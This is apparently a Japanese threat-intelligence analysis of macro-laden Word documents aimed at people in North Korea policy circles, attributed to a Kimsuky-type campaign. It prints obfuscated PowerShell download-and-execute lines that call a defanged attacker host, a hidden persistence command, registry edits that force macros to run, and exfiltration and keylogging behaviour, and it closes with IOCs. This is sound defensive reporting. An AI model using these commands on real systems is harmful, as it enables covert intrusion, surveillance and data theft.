ASEC 分析チームは、安全保障および対北朝鮮関連の特定人物をターゲットにする不正な Word ドキュメントが継続的に拡散していることを確認した。拡散が確認された Word ドキュメントのファイル名には、対北朝鮮に関する人物の名前が含まれているケースが多数存在し、当該分野をターゲットに攻撃が行われているものと推定される。最近確認された Word ドキュメントのファイル名は以下の通りである。
| 日付 | ファイル名 |
|---|---|
| 7/18 | (作成様式)2022年光復節式辞専門家の事前意見取りまとめ.doc |
| 7/20 | 0511_統一部 *** 部長会議録.doc |
| 8/1 | Asan Symposium 2022.doc |
| 8/3 | アンケート(研究委員 ヒョン**様).doc |
| 8/4 | アンケート(総長 アン**様).doc |
| 8/11 | (企画)セッション6.京畿道「平和と統一のための社会的対話」推進法案.doc |
| 8/16 | アンケート(博士 チョン**様).doc |
| 8/17 | 韓半島の安全保障と対北朝鮮戦略討論(キム**).doc |
Word ドキュメントには不正な VBA マクロが含まれており、このタイプは AhnLab TIP に公開した<2021年 Kimsuky 攻撃ワード(word)ドキュメント事例総整理解析レポート>にて確認されたタイプ B と同じである。全体的な動作方式は以下の図の通りである。
直近で確認された「韓半島の安全保障と対北朝鮮戦略討論(キム**).doc」で確認されたマクロコードは以下の通りである。
以前「Word ドキュメントを利用した特定の対象に対する APT 攻撃の試み」の記事で確認されたマクロコードよりもやや難読化されている。マクロを実行すると、PowerShell を通じて「hxxp://vjdif.mypressonline[.]com/ho/ng.txt」からさらなるスクリプトをダウンロードする。
| [string]$f={(Nwraew-Objwraect Newrat.WebwraCliwraewrant).Doweilsdjfeng(‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’)};$j=$f.Replace(‘wra’,”);$u=$j.Replace(‘eilsdjfe’,’nloadstri’);$x=iex $u;iex $x |
このスクリプトは以下のコマンドを利用してユーザー PC の情報を収集し、%APPDATA%\Ahnalb\Ahnlab.hwp に保存して当該ファイルの内容をエンコードして hxxp://vjdif.mypressonline[.]com/ho/post.php に転送する。
| 実行コマンド | 収集情報 |
|---|---|
| GetFolderPath(“Recent”) | 最近使ったフォルダーのパス |
| dir $env:ProgramFiles | ProgramFiles フォルダーの内容 |
| dir “C:\Program Files (x86) | C:\Program Files (x86) フォルダーの内容 |
| systeminfo | システム情報 |
| tasklist | 実行中のプロセスリスト |
このとき、HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run に AhnlabUpdate という名前のレジストリが存在する場合、情報収集は行わずに直ちにログファイルを転送する。これは、以降のキーロガーでも同じログファイル名(Ahnlab.hwp)を使用するために、当該キーロガーデータを収集するためであると思われる。
データ転送後は hxxp://vjdif.mypressonline.com/ho/ng.down にアクセスしてエンコードされたスクリプトを追加でダウンロードし、実行する。
追加でダウンロードした ng.down ファイルはエンコードされており、Start-Job コマンドによって PowerShell バックグラウンドタスクとして実行される。このスクリプトの機能は以下の通りである。
- ショートカットの生成
PowerShell コマンドが保存された C:\windows\temp フォルダーに HncSerial.log ファイルを生成する。また、マルウェアが持続的に動作できるように当該ファイルに対するショートカットを Startup フォルダーに生成する。
| [string]$a = {(New-Object Net.WebClient).Dokarysuntring(‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’)};$b=$a.replace(‘karysun’,’wnloadS’);$c=iex $b;iex $c |
ショートカットによって実行される PowerShell コマンドは以下の通りである。
| powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText(‘C:\windows\temp\HncSerial.log’);iex $x} |
- Office セキュリティ設定の変更
レジストリ値の変更によってマクロが常に実行されるよう、Office のセキュリティ設定を変更する。
| New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\14.0\Word\Security -Name VBAWarnings -Value 1 New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\15.0\Word\Security -Name VBAWarnings -Value 1 New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\16.0\Word\Security -Name VBAWarnings -Value 1 New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\17.0\Word\Security -Name VBAWarnings -Value 1 New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\18.0\Word\Security -Name VBAWarnings -Value 1 New-ItemProperty -Path HKCU:\SOFTWARE\Microsoft\Office\19.0\Word\Security -Name VBAWarnings -Value 1 |
- キーロガー
ユーザーのキー入力を %APPDATA%\Ahnalb\Ahnlab.hwp に記録する。記録された内容はユーザーが PC を起動時に、先に生成されたショートカットファイルが実行されて hxxp://vjdif.mypressonline[.]com/ho/ng.txt にアクセスし、当該ページに存在する PowerShell コマンドが実行されて hxxp://vjdif.mypressonline[.]com/ho/post.php に転送する。
対北朝鮮関連の人物をターゲットとする Word ドキュメントは以前から持続的に確認されているため、特に注意が必要である。送信者が不明なメールの添付ファイルや、出どころが不明なファイルは開かないようにしなければならない。また、Word ドキュメントに含まれている不正なマクロが自動で実行されないよう、適切なセキュリティ設定を維持しなければならない。
[ファイル検知]
Downloader/DOC.Kimsuky
Trojan/PowerShell.FileUpload
[IOC]
6f9c20f8f7f28a732b0853929a06b79c (VBA)
hxxp://vjdif.mypressonline[.]com/ho/ng.txt
hxxp://vjdif.mypressonline[.]com/ho/ng.down
hxxp://vjdif.mypressonline[.]com/ho/post.php
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報
[…] 分析チームは「対北朝鮮関連の特定人物をターゲットにする不正な Word ドキュメント」で確認された Word ドキュメントが、最近 FTP […]